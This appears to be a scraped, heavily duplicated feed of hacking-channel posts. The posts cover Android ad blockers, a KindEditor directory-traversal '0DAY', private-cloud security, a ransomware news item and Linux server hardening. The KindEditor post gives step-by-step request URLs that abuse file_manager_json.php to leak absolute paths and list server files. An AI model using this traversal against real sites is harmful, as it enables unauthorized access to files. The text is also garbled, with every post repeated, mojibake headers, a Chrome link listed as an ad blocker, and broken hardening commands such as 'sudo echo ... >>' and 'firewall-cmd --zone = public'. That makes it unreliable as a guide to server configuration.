β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST ANDROID WORKING ADD BLOCKERS :
https://f-droid.org/en/packages/org.adaway/
https://adblockplus.org/
https://adguard.com/en/adguard-android/overview.html
https://play.google.com/store/apps/details?id=com.android.chrome
https://block-this.com/
by android authority
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST ANDROID WORKING ADD BLOCKERS :
https://f-droid.org/en/packages/org.adaway/
https://adblockplus.org/
https://adguard.com/en/adguard-android/overview.html
https://play.google.com/store/apps/details?id=com.android.chrome
https://block-this.com/
by android authority
β β β Uππ»βΊπ«Δπ¬πβ β β β
f-droid.org
AdAway | F-Droid - Free and Open Source Android App Repository
A free and Open Source ad blocker for Android.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kindeditor traverse directory 0DAY problem :
KindEditor is a set of open source HTML visual editor, mainly used to allow users to obtain WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs. KindEditor is very suitable for use on CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in July 2006, KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.
π¦Use method:
1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2)http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kindeditor traverse directory 0DAY problem :
KindEditor is a set of open source HTML visual editor, mainly used to allow users to obtain WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs. KindEditor is very suitable for use on CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in July 2006, KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.
π¦Use method:
1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2)http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Explanation on the security of private cloud (cloud computing):
1) First of all, the technical foundation of cloud computing is based on an application management program. The hypervisor can isolate computing (and related security threats) from traditional security tools, and check for inappropriate or malicious data packets in network communications.
2) Since the virtual machines in the same server can communicate completely through the communication in the hypervisor, data packets can be sent from one virtual machine to another virtual machine without passing through a physical network. Generally installed security devices check the communication traffic on the physical network.
3) Crucially, this means that if a virtual machine is compromised, it can send dangerous communications to another virtual machine without even being aware of the organization's protective measures. In other words, an insecure application can cause attacks on other virtual machines, and the security measures adopted by the user are powerless.
From this, it is concluded that private clouds are also insecure.
4) I have no opinion on the above-mentioned overall theory, but is it a bit too arbitrary about the result? The above security issues do exist, but we have to see that it is not brought about by private clouds, but by virtualization. As the biggest difference between cloud computing and traditional computing, the problem of virtualization is real and will continue for some time to come.
5) The view of "public cloud is not secure, private cloud is secure" is of course incorrect. We can modify it, "Private cloud is safer than public cloud". On the one hand, the private cloud is deployed within the boundaries of the enterpriseβs own data center. Compared with the public cloud, it has a greater guarantee for data security, and it will not cause any damage to the provider due to security issues. It is equivalent to storing our data in our own safe.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Explanation on the security of private cloud (cloud computing):
1) First of all, the technical foundation of cloud computing is based on an application management program. The hypervisor can isolate computing (and related security threats) from traditional security tools, and check for inappropriate or malicious data packets in network communications.
2) Since the virtual machines in the same server can communicate completely through the communication in the hypervisor, data packets can be sent from one virtual machine to another virtual machine without passing through a physical network. Generally installed security devices check the communication traffic on the physical network.
3) Crucially, this means that if a virtual machine is compromised, it can send dangerous communications to another virtual machine without even being aware of the organization's protective measures. In other words, an insecure application can cause attacks on other virtual machines, and the security measures adopted by the user are powerless.
From this, it is concluded that private clouds are also insecure.
4) I have no opinion on the above-mentioned overall theory, but is it a bit too arbitrary about the result? The above security issues do exist, but we have to see that it is not brought about by private clouds, but by virtualization. As the biggest difference between cloud computing and traditional computing, the problem of virtualization is real and will continue for some time to come.
5) The view of "public cloud is not secure, private cloud is secure" is of course incorrect. We can modify it, "Private cloud is safer than public cloud". On the one hand, the private cloud is deployed within the boundaries of the enterpriseβs own data center. Compared with the public cloud, it has a greater guarantee for data security, and it will not cause any damage to the provider due to security issues. It is equivalent to storing our data in our own safe.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cheap malicious programs kidnap your computer and force you to pay ransom :
The trend of contemporary Trojan horse malware is not just to crash your computer or steal your bank password through flood-like advertisements, but to lock your computer and prevent you from doing anything unless you hand it in. ransom
1) With the development of the times, the trend of contemporary Trojan horse malware is not just to crash your computer or steal your bank password through flood-like advertisements, but to lock your computer and prevent you from doing anything.
2) Things, unless you pay a "ransom." The recent popular "ransomware" was first discovered on the abuse.ch website, using the malicious development tool "Blackhole". Moreover, this cheap malicious program can be collected through underground forums and infected systems, and it can easily and conveniently invade the Internet in the form of Adobe Flash Player, Adobe Reader or Java web plug-ins.
3) Once infected, the target system will be locked, and users need to log in to their fake website to pay a "ransom" before they can use your computer normally. It is reported that the "ransomware" has the most severe infections in Australia, France, Germany, the Netherlands, Switzerland and the United Kingdom. For example, in the United Kingdom, users will have to pay Β£50 ($80) after being infected with this malware. However, after unlocking, even though the user has achieved control over the computer, the Aldi Bot variant malware will still be installed, which may become a broiler of DDoS attacks
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cheap malicious programs kidnap your computer and force you to pay ransom :
The trend of contemporary Trojan horse malware is not just to crash your computer or steal your bank password through flood-like advertisements, but to lock your computer and prevent you from doing anything unless you hand it in. ransom
1) With the development of the times, the trend of contemporary Trojan horse malware is not just to crash your computer or steal your bank password through flood-like advertisements, but to lock your computer and prevent you from doing anything.
2) Things, unless you pay a "ransom." The recent popular "ransomware" was first discovered on the abuse.ch website, using the malicious development tool "Blackhole". Moreover, this cheap malicious program can be collected through underground forums and infected systems, and it can easily and conveniently invade the Internet in the form of Adobe Flash Player, Adobe Reader or Java web plug-ins.
3) Once infected, the target system will be locked, and users need to log in to their fake website to pay a "ransom" before they can use your computer normally. It is reported that the "ransomware" has the most severe infections in Australia, France, Germany, the Netherlands, Switzerland and the United Kingdom. For example, in the United Kingdom, users will have to pay Β£50 ($80) after being infected with this malware. However, after unlocking, even though the user has achieved control over the computer, the Aldi Bot variant malware will still be installed, which may become a broiler of DDoS attacks
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Things to do after installing a Linux server :
1) Make sure a non-root user is configured.
Root is omnipotent and you don't need root rights all the time.
root is also a valid username on almost every Linux system. This means that if remote authentication is enabled, half of an attacker's job - getting a valid username - is done.
In addition, if an attacker can log on as root, no additional permissions are required to perform any action on the system.
For these reasons, it is best to log in as a non-root user and disable root logins for remote access using SSH (explained later).
π¦How to do it?
We will assume that you are logged in as root.
Add a new user using the useradd command . Replace <username> with any username of your choice.
useradd <username>
Set a password using the passwd command for the newly added user:
passwd <username>
2) Make sure the non-root user has sudo permission.
Since you will be logging into this account remotely using Secure Shell (SSH), you will want to be able to perform privileged actions that require root access. This means that the account must have sudo permissions.
π¦How to do it?
The process for creating a SUDO user on Ubuntu and CentOS is similar, but the group you will be adding the user to is different.
You must be logged in as root to complete this step.
On CentOS and Red Hat, the wheel group is the standard group used to grant Sudo users permission. Add a user to this group using the usermod command:
usermod -aG wheel <username>
Ubuntu uses the sudo group to manage sudo users.
usermod -aG sudo <username>
3) Enabling SSH Key Based Authentication
It is important that key based authentication is enabled for SSH so that it works when we disable password based authentication.
Cracked, compromised passwords are a very common way for attackers to gain access to systems. Spear phishing , spamming that prompts an unsuspecting user to provide credentials, is just one of the common methods of obtaining credentials.
If someone gets your username and password on a system that has key-based authentication enabled and password-based authentication disabled for remote SSH access, the stolen password will no longer grant them access to that server.
4) Make sure SSH is allowed through the ufw firewall.
Before you enable the firewall on your system, you must make sure SSH is allowed. Otherwise, you may be locked out of your system when accessing it remotely.
π¦How to do it?
Ubuntu uses uncomplicated firewall (ufw) and CentOS / Red Hat uses firewalld.
On CentOS / Red Hat, use the firewall-cmd command:
sudo firewall-cmd --zone = public --add-service = ssh --permanent
On Ubuntu, use the ufw command like this:
sudo ufw allow ssh
5) Turn on firewall (only after SSH permission)
The firewall ensures that only specially permitted traffic can enter your server. If an attacker receives malware on your server and tries to communicate through a prohibited port, or if the service is accidentally enabled, it cannot be used to compromise your server or further compromise it.
π¦How to do it?
On CentOS / Red Hat systems, enable the firewalld systemd service:
sudo systemctl start firewalld
sudo systemctl enable firewalld
On Ubuntu use this command:
sudo ufw enable
6) Configure SSH not to display the banner.
One of the ways an attacker can compromise your server is through bugs in the software that runs your services. The banner can display information about which version of OpenSSH or operating system you are using. There is no point in giving information to the bad guys. Make them work for it!
π¦How to do it?
By default, no banner is displayed on CentOS / Red Hat, so no action is required.
On Ubuntu, you can use:
sudo echo "DebianBanner no" >> /etc/ssh/sshd_config.d/10-my-sshd-settings.conf
π¦Things to do after installing a Linux server :
1) Make sure a non-root user is configured.
Root is omnipotent and you don't need root rights all the time.
root is also a valid username on almost every Linux system. This means that if remote authentication is enabled, half of an attacker's job - getting a valid username - is done.
In addition, if an attacker can log on as root, no additional permissions are required to perform any action on the system.
For these reasons, it is best to log in as a non-root user and disable root logins for remote access using SSH (explained later).
π¦How to do it?
We will assume that you are logged in as root.
Add a new user using the useradd command . Replace <username> with any username of your choice.
useradd <username>
Set a password using the passwd command for the newly added user:
passwd <username>
2) Make sure the non-root user has sudo permission.
Since you will be logging into this account remotely using Secure Shell (SSH), you will want to be able to perform privileged actions that require root access. This means that the account must have sudo permissions.
π¦How to do it?
The process for creating a SUDO user on Ubuntu and CentOS is similar, but the group you will be adding the user to is different.
You must be logged in as root to complete this step.
On CentOS and Red Hat, the wheel group is the standard group used to grant Sudo users permission. Add a user to this group using the usermod command:
usermod -aG wheel <username>
Ubuntu uses the sudo group to manage sudo users.
usermod -aG sudo <username>
3) Enabling SSH Key Based Authentication
It is important that key based authentication is enabled for SSH so that it works when we disable password based authentication.
Cracked, compromised passwords are a very common way for attackers to gain access to systems. Spear phishing , spamming that prompts an unsuspecting user to provide credentials, is just one of the common methods of obtaining credentials.
If someone gets your username and password on a system that has key-based authentication enabled and password-based authentication disabled for remote SSH access, the stolen password will no longer grant them access to that server.
4) Make sure SSH is allowed through the ufw firewall.
Before you enable the firewall on your system, you must make sure SSH is allowed. Otherwise, you may be locked out of your system when accessing it remotely.
π¦How to do it?
Ubuntu uses uncomplicated firewall (ufw) and CentOS / Red Hat uses firewalld.
On CentOS / Red Hat, use the firewall-cmd command:
sudo firewall-cmd --zone = public --add-service = ssh --permanent
On Ubuntu, use the ufw command like this:
sudo ufw allow ssh
5) Turn on firewall (only after SSH permission)
The firewall ensures that only specially permitted traffic can enter your server. If an attacker receives malware on your server and tries to communicate through a prohibited port, or if the service is accidentally enabled, it cannot be used to compromise your server or further compromise it.
π¦How to do it?
On CentOS / Red Hat systems, enable the firewalld systemd service:
sudo systemctl start firewalld
sudo systemctl enable firewalld
On Ubuntu use this command:
sudo ufw enable
6) Configure SSH not to display the banner.
One of the ways an attacker can compromise your server is through bugs in the software that runs your services. The banner can display information about which version of OpenSSH or operating system you are using. There is no point in giving information to the bad guys. Make them work for it!
π¦How to do it?
By default, no banner is displayed on CentOS / Red Hat, so no action is required.
On Ubuntu, you can use:
sudo echo "DebianBanner no" >> /etc/ssh/sshd_config.d/10-my-sshd-settings.conf
7) Disable SSH forwarding.
While it is not uncommon for administrators to use SSH forwarding to encrypt traffic that might otherwise be in cleartext, if you are not using it, you should disable it. Forwarding can be used by an attacker to encrypt traffic so it is harder for you to view it, or to receive traffic that would otherwise be blocked from transmitting using an authorized port and service.
π¦How to do it?
On CentOS / Red Hat add the following // etc / ssh / sshd_config:
DisableForwarding yes
On Ubuntu add DisableForwarding yes to the 10-my-sshd-settings.conf file:
sudo echo "DisableForwarding yes" >> /etc/ssh/sshd_config.d/10-my-sshd-settings.conf
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
While it is not uncommon for administrators to use SSH forwarding to encrypt traffic that might otherwise be in cleartext, if you are not using it, you should disable it. Forwarding can be used by an attacker to encrypt traffic so it is harder for you to view it, or to receive traffic that would otherwise be blocked from transmitting using an authorized port and service.
π¦How to do it?
On CentOS / Red Hat add the following // etc / ssh / sshd_config:
DisableForwarding yes
On Ubuntu add DisableForwarding yes to the 10-my-sshd-settings.conf file:
sudo echo "DisableForwarding yes" >> /etc/ssh/sshd_config.d/10-my-sshd-settings.conf
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β